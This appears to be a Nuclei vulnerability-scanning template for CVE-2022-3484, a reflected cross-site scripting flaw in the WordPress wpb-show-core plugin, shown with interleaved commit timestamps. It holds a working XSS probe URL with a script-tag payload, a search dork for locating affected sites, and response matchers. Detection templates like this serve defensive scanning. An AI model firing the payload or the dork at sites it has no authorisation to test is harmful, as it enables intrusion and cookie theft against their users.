2022-11-15 16:58:27 +00:00
id : CVE-2022-3484
info :
2022-12-13 20:36:48 +00:00
name : WordPress WPB Show Core - Cross-Site Scripting
2022-11-15 16:58:27 +00:00
author : theamanrawat
severity : medium
description : |
2022-12-13 20:36:48 +00:00
WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-11-15 16:58:27 +00:00
reference :
- https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464
- https://nvd.nist.gov/vuln/detail/CVE-2022-3484
classification :
2022-11-23 08:56:41 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-11-15 16:58:27 +00:00
cve-id : CVE-2022-3484
2022-11-23 08:56:41 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:wpb_show_core_project:wpb_show_core:*:*:*:*:*:*:*:*
epss-score : 0.00064
2022-11-15 16:58:27 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-11-24 09:22:10 +00:00
verified : true
2023-01-24 10:07:47 +00:00
google-query : inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php
2022-11-24 09:49:52 +00:00
tags : wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core
2022-11-15 16:58:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-11-15 16:58:27 +00:00
- method : GET
path :
2022-11-16 10:52:06 +00:00
- '{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2022-11-15 16:58:27 +00:00
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(content_type, "text/html")'
2022-11-16 10:52:06 +00:00
- 'contains(body, "wpb_jplayer_setting")'
- 'contains(body, "<script>alert(document.domain)</script>")'
condition : and
2022-12-13 20:36:48 +00:00
# Enhanced by md on 2022/12/13